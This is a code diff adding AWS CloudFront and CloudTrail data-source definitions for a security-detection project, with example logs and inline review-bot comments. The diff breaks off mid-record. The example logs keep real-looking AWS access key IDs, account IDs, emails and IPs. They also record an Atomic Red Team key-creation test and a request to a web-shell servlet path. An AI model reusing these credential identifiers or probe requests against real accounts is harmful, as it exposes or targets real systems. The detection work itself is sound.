diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 57c9873004..13e95e8001 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -23,7 +23,7 @@ jobs:
- name: Install Python Dependencies and ContentCTL and Atomic Red Team
run: |
- pip install contentctl==4.1.5
+ pip install contentctl==4.2.0
git clone --depth=1 --single-branch --branch=master https://github.com/redcanaryco/atomic-red-team.git
- name: Running build with enrichments
diff --git a/.github/workflows/unit-testing.yml b/.github/workflows/unit-testing.yml
index 1535f2d09e..4f51b0b1cb 100644
--- a/.github/workflows/unit-testing.yml
+++ b/.github/workflows/unit-testing.yml
@@ -24,7 +24,7 @@ jobs:
- name: Install Python Dependencies and ContentCTL
run: |
python -m pip install --upgrade pip
- pip install contentctl==4.1.5
+ pip install contentctl==4.2.0
# Running contentctl test with a few arguments, before running the command make sure you checkout into the current branch of the pull request. This step only performs unit testing on all the changes against the target-branch. In most cases this target branch will be develop
# Make sure we check out the PR, even if it actually lives in a fork
diff --git a/data_sources/application/PingID.yml b/data_sources/application/PingID.yml
deleted file mode 100644
index 5469e4b976..0000000000
--- a/data_sources/application/PingID.yml
+++ /dev/null
@@ -1,38 +0,0 @@
-name: PingID
-id: 17890675-61c1-40bd-a88e-6a8e9e246b43
-author: Patrick Bareiss, Splunk
-source: XmlWinEventLog:Security
-sourcetype: XmlWinEventLog
-supported_TA: {}
-event_names: []
-fields:
- - _time
- - actors{}.name
- - actors{}.type
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - extracted_source
- - host
- - id
- - index
- - linecount
- - punct
- - recorded
- - resources{}.ipaddress
- - resources{}.websession
- - result.message
- - result.status
- - source
- - sourcetype
- - splunk_server
- - timeendpos
- - timestartpos
-example_log:
- '{"source":"PINGID","id":"b2eb1fef-651b-11ee-b38b-0ac7a554ed19","recorded":"2023-10-05T14:10:53.538Z","actors":[{"type":"user","name":"victim_user"}],"resources":[{"ipaddress":"174.235.80.142","websession":"webs_ijkF-T_bAC_G3w2TfvdpAEQeC545KFlqVFOsolCXdjo"}],"result":{"status":"SUCCESS","message":"Device
- Paired SMS \"Mobile 1\""}}'
diff --git a/data_sources/application/Splunk.yml b/data_sources/application/Splunk.yml
deleted file mode 100644
index 15ff9ed068..0000000000
--- a/data_sources/application/Splunk.yml
+++ /dev/null
@@ -1,34 +0,0 @@
-name: Splunk
-id: d8a2c791-460b-4756-a8e5-ecade77b21e3
-author: Patrick Bareiss, Splunk
-source: splunkd_ui_access.log
-sourcetype: splunkd_ui_access
-supported_TA: {}
-event_names: []
-fields:
- - _time
- - action
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - dest
- - host
- - index
- - info
- - linecount
- - punct
- - source
- - sourcetype
- - splunk_server
- - timeendpos
- - timestamp
- - timestartpos
- - user
-example_log:
- "Audit:[timestamp=01-25-2023 22:08:54.818, user=admin, action=search,
- info=granted REST: /search/jobs/rt_1674684525.24/events]"
diff --git a/data_sources/aws_cloudfront.yml b/data_sources/aws_cloudfront.yml
new file mode 100644
index 0000000000..f97be5b2b4
--- /dev/null
+++ b/data_sources/aws_cloudfront.yml
@@ -0,0 +1,98 @@
+name: AWS Cloudfront
+id: 780086dc-2384-45b6-ade7-56cb00105464
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS Cloudfront
+source: aws
+sourcetype: aws:cloudfront:accesslogs
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- bytes
+- bytes_in
+- bytes_out
+- c_ip
+- c_port
+- cached
+- category
+- client_ip
+- cs_bytes
+- cs_cookie
+- cs_host
+- cs_method
+- cs_protocol
+- cs_protocol_version
+- cs_referer
+- cs_uri_query
+- cs_uri_stem
+- cs_user_agent
+- date
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- duration
+- edge_location_name
+- eventtype
+- fle_encrypted_fields
+- fle_status
+- host
+- http_content_type
+- http_method
+- http_user_agent
+- http_user_agent_length
+- index
+- linecount
+- punct
+- response_time
+- sc_bytes
+- sc_content_len
+- sc_content_type
+- sc_range_end
+- sc_range_start
+- sc_status
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_port
+- ssl_cipher
+- ssl_protocol
+- status
+- tag
+- tag::eventtype
+- time
+- time_taken
+- time_to_first_byte
+- timeendpos
+- timestartpos
+- uri_path
+- url
+- url_domain
+- url_length
+- vendor_product
+- x_edge_detail_result_type
+- x_edge_location
+- x_edge_request_id
+- x_edge_response_result_type
+- x_edge_result_type
+- x_forwarded_for
+- x_host_header
+example_log: "2023-11-07\t16:58:21\tIAD55-P5\t921\t44.192.78.55\tGET\td3u5aue66f5ui4.cloudfront.net\t\
+ /plugins/servlet/com.jsos.shell/ShellServlet\t200\t-\tSlackbot-LinkExpanding%201.0%20(+https://api.slack.com/robots)\t\
+ -\t-\tLambdaGeneratedResponse\tsGwvFCkFU4qlMxatCoJRgW87P7Ee8bKQor3U6lRt6I6jaFvLC7vcPA==\t\
+ confluence.catjamfest.com\thttps\t232\t0.276\t-\tTLSv1.3\tTLS_AES_128_GCM_SHA256\t\
+ LambdaGeneratedResponse\tHTTP/1.1\t-\t-\t57232\t0.276\tLambdaGeneratedResponse\t\
+ text/html\t527\t-\t-"
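Review bot: The add-on `version: 7.4.1` under `supported_TA` near the top of this hunk is an unquoted plain scalar that only stays a string because it contains two dots; a future bump to `7.5` or `7.10` would be loaded as the float `7.5`/`7.1` and silently change the value contentctl presumably compares or reports. Quote it as `version: '7.4.1'`, matching the way `date: '2024-07-18'` is already quoted a few lines above. The same unquoted `version: 7.4.1` appears in every other new data_sources file in this diff (aws_cloudtrail.yml, aws_cloudtrail_assumerolewithsaml.yml, aws_cloudtrail_consolelogin.yml, aws_cloudtrail_copyobject.yml, aws_cloudtrail_createaccesskey.yml, aws_cloudtrail_createkey.yml, aws_cloudtrail_createloginprofile.yml, aws_cloudtrail_createnetworkaclentry.yml, aws_cloudtrail_createpolicyversion.yml). As a point of style, `name: AWS Cloudfront` and the description use a lowercase "f" while the AWS product name and the sibling files' `CloudTrail` casing suggest `AWS CloudFront`.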
diff --git a/data_sources/aws_cloudtrail.yml b/data_sources/aws_cloudtrail.yml
new file mode 100644
index 0000000000..c22708e508
--- /dev/null
+++ b/data_sources/aws_cloudtrail.yml
@@ -0,0 +1,14 @@
+name: AWS CloudTrail
+id: e8ace6db-1dbd-4c72-a1fb-334684619a38
+version: 1
+date: '2024-07-24'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+
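Review bot: This generic `aws_cloudtrail.yml` object carries no `fields` and no `example_log`, unlike every other data_sources file added in this diff; if contentctl's data-source schema treats them as required (not visible from the diff) `contentctl validate` will reject the file, and if they are optional the object still cannot support field-coverage checks the way its per-eventName siblings can. Either add the two keys or state in the `description` that the per-eventName files carry that detail, e.g. `description: Generic data source object for AWS CloudTrail; field lists live in the per-eventName aws_cloudtrail_* objects`. The final added line is an empty line, which yamllint flags as trailing blank lines at end of file; drop it.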
diff --git a/data_sources/aws_cloudtrail_assumerolewithsaml.yml b/data_sources/aws_cloudtrail_assumerolewithsaml.yml
new file mode 100644
index 0000000000..f18e90df40
--- /dev/null
+++ b/data_sources/aws_cloudtrail_assumerolewithsaml.yml
@@ -0,0 +1,126 @@
+name: AWS CloudTrail AssumeRoleWithSAML
+id: 1e28f2a6-2db9-405f-b298-18734a293f77
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail AssumeRoleWithSAML
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.durationSeconds
+- requestParameters.principalArn
+- requestParameters.roleArn
+- requestParameters.roleSessionName
+- requestParameters.sAMLAssertionID
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements.assumedRoleUser.arn
+- responseElements.assumedRoleUser.assumedRoleId
+- responseElements.audience
+- responseElements.credentials.accessKeyId
+- responseElements.credentials.expiration
+- responseElements.credentials.sessionToken
+- responseElements.issuer
+- responseElements.nameQualifier
+- responseElements.subject
+- responseElements.subjectType
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_user
+- src_user_id
+- src_user_type
+- start_time
+- status
+- tag
+- tag::action
+- tag::eventtype
+- temp_access_key
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.identityProvider
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- user_agent
+- user_arn
+- user_id
+- user_name
+- user_role
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "SAMLUser", "principalId":
+ "ZRu9MRAjiG9tvi1QBNfdI664G5A=:rodsoto@rodsoto.onmicrosoft.com", "userName": "rodsoto@rodsoto.onmicrosoft.com",
+ "identityProvider": "ZRu9MRAjiG9tvi1QBNfdI664G5A="}, "eventTime": "2021-01-22T03:44:16Z",
+ "eventSource": "sts.amazonaws.com", "eventName": "AssumeRoleWithSAML", "awsRegion":
+ "us-east-1", "sourceIPAddress": "72.21.217.152", "userAgent": "AWS Signin, aws-internal/3
+ aws-sdk-java/1.11.898 Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.275-b01
+ java/1.8.0_275 kotlin/1.3.72 vendor/Oracle_Corporation", "requestParameters": {"sAMLAssertionID":
+ "_d33ba0ad-0c88-4b83-80a6-27c08027d000", "roleSessionName": "rodsoto@rodsoto.onmicrosoft.com",
+ "durationSeconds": 3600, "roleArn": "arn:aws:iam::111111111111:role/rodonmicrotestrole",
+ "principalArn": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"}, "responseElements":
+ {"subjectType": "urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress", "issuer":
+ "https://sts.windows.net/0e8108b1-18e9-41a4-961b-dfcddf92ef08/", "credentials":
+ {"accessKeyId": "ASIAYTOGP2RLKJXOV7VR", "expiration": "Jan 22, 2021 3:59:16 AM",
+ "sessionToken": "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"},
+ "nameQualifier": "ZRu9MRAjiG9tvi1QBNfdI664G5A=", "assumedRoleUser": {"assumedRoleId":
+ "AROAYTOGP2RLKFUVAQAIJ:rodsoto@rodsoto.onmicrosoft.com", "arn": "arn:aws:sts::111111111111:assumed-role/rodonmicrotestrole/rodsoto@rodsoto.onmicrosoft.com"},
+ "subject": "rodsoto@rodsoto.onmicrosoft.com", "audience": "https://signin.aws.amazon.com/saml"},
+ "requestID": "e19c7a7f-cd96-4642-9ee6-2360a7b01b12", "eventID": "b25b825d-9c9b-49d3-9ecd-290dbe8f2c29",
+ "readOnly": true, "resources": [{"accountId": "111111111111", "type": "AWS::IAM::Role",
+ "ARN": "arn:aws:iam::111111111111:role/rodonmicrotestrole"}, {"accountId": "111111111111",
+ "type": "AWS::IAM::SAMLProvider", "ARN": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"}],
+ "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management",
+ "recipientAccountId": "111111111111"}'
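Review bot: The `example_log` embeds a complete STS credential triple (`responseElements.credentials.accessKeyId`, `expiration` and `sessionToken`); the expiration is in 2021 and the token value appears redacted in this copy, but a committed session token in a public repository will trip secret scanners and is not needed for the `fields` list above to validate. Replace it with an obviously fake value such as `"sessionToken": "REDACTED_SESSION_TOKEN"`. The user e-mail addresses in `principalId`, `userName`, `roleSessionName`, `subject` and the assumed-role ARN, and the identity-provider tenant GUID in the `issuer` URL, are retained while every `accountId` has already been normalised to `111111111111`; if the record came from a live tenant rather than a lab, apply the same scrubbing to those values.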
diff --git a/data_sources/aws_cloudtrail_consolelogin.yml b/data_sources/aws_cloudtrail_consolelogin.yml
new file mode 100644
index 0000000000..76f955a0be
--- /dev/null
+++ b/data_sources/aws_cloudtrail_consolelogin.yml
@@ -0,0 +1,102 @@
+name: AWS CloudTrail ConsoleLogin
+id: b68b3f26-bd21-4fa8-b593-616fe75ac0ae
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail ConsoleLogin
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- additionalEventData.LoginTo
+- additionalEventData.MFAUsed
+- additionalEventData.MobileVersion
+- app
+- authentication_method
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- desc
+- dest
+- dvc
+- errorCode
+- errorMessage
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- reason
+- recipientAccountId
+- region
+- requestParameters
+- responseElements.ConsoleLogin
+- result
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.type
+- userIdentity.userName
+- user_access_key
+- user_agent
+- user_group_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "accountId":
+ "140429656527", "accessKeyId": "", "userName": "HIDDEN_DUE_TO_SECURITY_REASONS"},
+ "eventTime": "2022-10-19T20:33:38Z", "eventSource": "signin.amazonaws.com", "eventName":
+ "ConsoleLogin", "awsRegion": "us-east-1", "sourceIPAddress": "142.254.89.27", "userAgent":
+ "Go-http-client/1.1", "errorMessage": "No username found in supplied account", "requestParameters":
+ null, "responseElements": {"ConsoleLogin": "Failure"}, "additionalEventData": {"LoginTo":
+ "https://console.aws.amazon.com", "MobileVersion": "No", "MFAUsed": "No"}, "eventID":
+ "9fcfb8c3-3fca-48db-85d2-7b107f9d95d0", "readOnly": false, "eventType": "AwsConsoleSignIn",
+ "managementEvent": true, "recipientAccountId": "140429656527", "eventCategory":
+ "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+ "clientProvidedHostHeader": "signin.aws.amazon.com"}}'
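Review bot: The `accountId` and `recipientAccountId` value `140429656527` in this `example_log` is a real-looking 12-digit AWS account ID, whereas the other new example logs in this diff normalise the account to `111111111111`; the `userName` in the same record was already replaced with `HIDDEN_DUE_TO_SECURITY_REASONS`, so the account ID was presumably meant to be scrubbed as well. The same applies to `121521347698` in aws_cloudtrail_createaccesskey.yml, where the identical IAM user `bhavin_cli` and access key ID appear with `111111111111` in aws_cloudtrail_createloginprofile.yml, which suggests one of the two files was missed. The `sourceIPAddress` `142.254.89.27` is likewise a public address kept verbatim; a documentation-range address (e.g. `203.0.113.27`) conveys the same thing without pointing at a real host.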
diff --git a/data_sources/aws_cloudtrail_copyobject.yml b/data_sources/aws_cloudtrail_copyobject.yml
new file mode 100644
index 0000000000..d523b69f1e
--- /dev/null
+++ b/data_sources/aws_cloudtrail_copyobject.yml
@@ -0,0 +1,119 @@
+name: AWS CloudTrail CopyObject
+id: 965083f4-64a8-403f-99cc-252e1a6bd3b6
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CopyObject
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- additionalEventData.AuthenticationMethod
+- additionalEventData.CipherSuite
+- additionalEventData.SSEApplied
+- additionalEventData.SignatureVersion
+- additionalEventData.bytesTransferredIn
+- additionalEventData.bytesTransferredOut
+- additionalEventData.x-amz-id-2
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.Host
+- requestParameters.bucketName
+- requestParameters.key
+- requestParameters.x-amz-copy-source
+- requestParameters.x-amz-server-side-encryption
+- requestParameters.x-amz-server-side-encryption-aws-kms-key-id
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements.x-amz-server-side-encryption
+- responseElements.x-amz-server-side-encryption-aws-kms-key-id
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLNALZHZ6KX", "arn": "arn:aws:iam::111111111111:user/patrick_cli", "accountId":
+ "111111111111", "accessKeyId": "AKIAYTOGP2RLJ2OYSF6E", "userName": "patrick_cli"},
+ "eventTime": "2021-01-11T12:40:47Z", "eventSource": "s3.amazonaws.com", "eventName":
+ "CopyObject", "awsRegion": "us-west-2", "sourceIPAddress": "95.90.199.65", "userAgent":
+ "[aws-cli/2.0.45 Python/3.7.4 Darwin/20.2.0 exe/x86_64 command/s3.cp]", "requestParameters":
+ {"bucketName": "patricktestbucketencrypt", "x-amz-server-side-encryption-aws-kms-key-id":
+ "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1", "Host":
+ "patricktestbucketencrypt.s3.us-west-2.amazonaws.com", "x-amz-server-side-encryption":
+ "aws:kms", "x-amz-copy-source": "patricktestbucketencrypt/kms_aws_events.json",
+ "key": "kms_aws_events_encrypted.json"}, "responseElements": {"x-amz-server-side-encryption":
+ "aws:kms", "x-amz-server-side-encryption-aws-kms-key-id": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1"},
+ "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+ "bytesTransferredIn": 0.0, "SSEApplied": "SSE_KMS", "AuthenticationMethod": "AuthHeader",
+ "x-amz-id-2": "fqzX1iZV6ImDtkFxbGvziOE6fUwryRa+PhnLckfVAkLNHdbCAHNq4l/yckUd1a2HNJPL6NAS01U=",
+ "bytesTransferredOut": 234.0}, "requestID": "6A7359F7A9414B02", "eventID": "b20d43de-175d-4443-acd7-f5f3e587ae00",
+ "readOnly": false, "resources": [{"type": "AWS::S3::Object", "ARN": "arn:aws:s3:::patricktestbucketencrypt/kms_aws_events_encrypted.json"},
+ {"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::patricktestbucketencrypt"},
+ {"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::patricktestbucketencrypt"},
+ {"type": "AWS::S3::Object", "ARN": "arn:aws:s3:::patricktestbucketencrypt/kms_aws_events.json"}],
+ "eventType": "AwsApiCall", "managementEvent": false, "recipientAccountId": "111111111111",
+ "eventCategory": "Data"}'
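Review bot: The `example_log` keeps a long-term IAM access key ID verbatim (`"accessKeyId": "AKIAYTOGP2RLJ2OYSF6E"`); the secret half is absent, but `AKIA`-prefixed IDs are exactly what secret-scanning rules match, so this file will raise scanner findings on every push, as will the `AKIA…` IDs in aws_cloudtrail_createaccesskey.yml (including the newly created key inside `responseElements.accessKey`) and aws_cloudtrail_createloginprofile.yml. AWS documents `AKIAIOSFODNN7EXAMPLE` as a placeholder key ID, and most scanners allowlist it; substituting it keeps the field structure intact while removing a real-looking identifier. Since `accountId` in this record is already normalised to `111111111111`, the key IDs look like leftovers from the original capture rather than intentional.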
diff --git a/data_sources/aws_cloudtrail_createaccesskey.yml b/data_sources/aws_cloudtrail_createaccesskey.yml
new file mode 100644
index 0000000000..2585e83466
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createaccesskey.yml
@@ -0,0 +1,103 @@
+name: AWS CloudTrail CreateAccessKey
+id: 0460f7da-3254-4d90-b8c0-2ca657d0cea0
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreateAccessKey
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.userName
+- responseElements.accessKey.accessKeyId
+- responseElements.accessKey.createDate
+- responseElements.accessKey.status
+- responseElements.accessKey.userName
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_user_name
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::121521347698:user/bhavin_cli", "accountId":
+ "121521347698", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"},
+ "eventTime": "2021-03-02T21:18:24Z", "eventSource": "iam.amazonaws.com", "eventName":
+ "CreateAccessKey", "awsRegion": "us-east-1", "sourceIPAddress": "12.25.72.12", "userAgent":
+ "aws-cli/2.0.62 Python/3.9.0 Darwin/19.6.0 source/x86_64 command/iam.create-access-key",
+ "requestParameters": {"userName": "AtomicRedTeam"}, "responseElements": {"accessKey":
+ {"userName": "AtomicRedTeam", "accessKeyId": "AKIAYTOGP2RLOQ4ULYGT", "status": "Active",
+ "createDate": "Mar 2, 2021 9:18:24 PM"}}, "requestID": "12c8773d-6c78-46bf-a8e4-f841adc8f70d",
+ "eventID": "5772e8d5-cccc-470d-81ef-acacfe85a804", "readOnly": false, "eventType":
+ "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId":
+ "121521347698"}'
diff --git a/data_sources/aws_cloudtrail_createkey.yml b/data_sources/aws_cloudtrail_createkey.yml
new file mode 100644
index 0000000000..5279b10239
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createkey.yml
@@ -0,0 +1,150 @@
+name: AWS CloudTrail CreateKey
+id: fcfc1593-b6b5-4a0f-91c5-3c395116a8b9
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreateKey
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.bypassPolicyLockoutSafetyCheck
+- requestParameters.customerMasterKeySpec
+- requestParameters.description
+- requestParameters.keyUsage
+- requestParameters.origin
+- requestParameters.policy
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements.keyMetadata.aWSAccountId
+- responseElements.keyMetadata.arn
+- responseElements.keyMetadata.creationDate
+- responseElements.keyMetadata.customerMasterKeySpec
+- responseElements.keyMetadata.description
+- responseElements.keyMetadata.enabled
+- responseElements.keyMetadata.encryptionAlgorithms{}
+- responseElements.keyMetadata.keyId
+- responseElements.keyMetadata.keyManager
+- responseElements.keyMetadata.keyState
+- responseElements.keyMetadata.keyUsage
+- responseElements.keyMetadata.origin
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+ "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local",
+ "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLK74OPBDR", "sessionContext":
+ {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn":
+ "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName":
+ "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated":
+ "false", "creationDate": "2021-01-11T09:03:18Z"}}}, "eventTime": "2021-01-11T09:56:31Z",
+ "eventSource": "kms.amazonaws.com", "eventName": "CreateKey", "awsRegion": "us-west-2",
+ "sourceIPAddress": "95.90.199.65", "userAgent": "aws-internal/3 aws-sdk-java/1.11.893
+ Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.272-b10
+ java/1.8.0_272 vendor/Oracle_Corporation", "requestParameters": {"origin": "AWS_KMS",
+ "policy": "{\n \"Id\": \"key-consolepolicy-3\",\n \"Version\": \"2012-10-17\",\n \"Statement\":
+ [\n {\n \"Sid\": \"Enable IAM User Permissions\",\n \"Effect\":
+ \"Allow\",\n \"Principal\": {\n \"AWS\": \"arn:aws:iam::111111111111:root\"\n },\n \"Action\":
+ \"kms:*\",\n \"Resource\": \"*\"\n },\n {\n \"Sid\":
+ \"Allow access for Key Administrators\",\n \"Effect\": \"Allow\",\n \"Principal\":
+ {\n \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n },\n \"Action\":
+ [\n \"kms:Create*\",\n \"kms:Describe*\",\n \"kms:Enable*\",\n \"kms:List*\",\n \"kms:Put*\",\n \"kms:Update*\",\n \"kms:Revoke*\",\n \"kms:Disable*\",\n \"kms:Get*\",\n \"kms:Delete*\",\n \"kms:TagResource\",\n \"kms:UntagResource\",\n \"kms:ScheduleKeyDeletion\",\n \"kms:CancelKeyDeletion\"\n ],\n \"Resource\":
+ \"*\"\n },\n {\n \"Sid\": \"Allow use of the key\",\n \"Effect\":
+ \"Allow\",\n \"Principal\": {\n \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n },\n \"Action\":
+ [\n \"kms:Encrypt\",\n \"kms:Decrypt\",\n \"kms:ReEncrypt*\",\n \"kms:GenerateDataKey*\",\n \"kms:DescribeKey\"\n ],\n \"Resource\":
+ \"*\"\n },\n {\n \"Sid\": \"Allow attachment of persistent
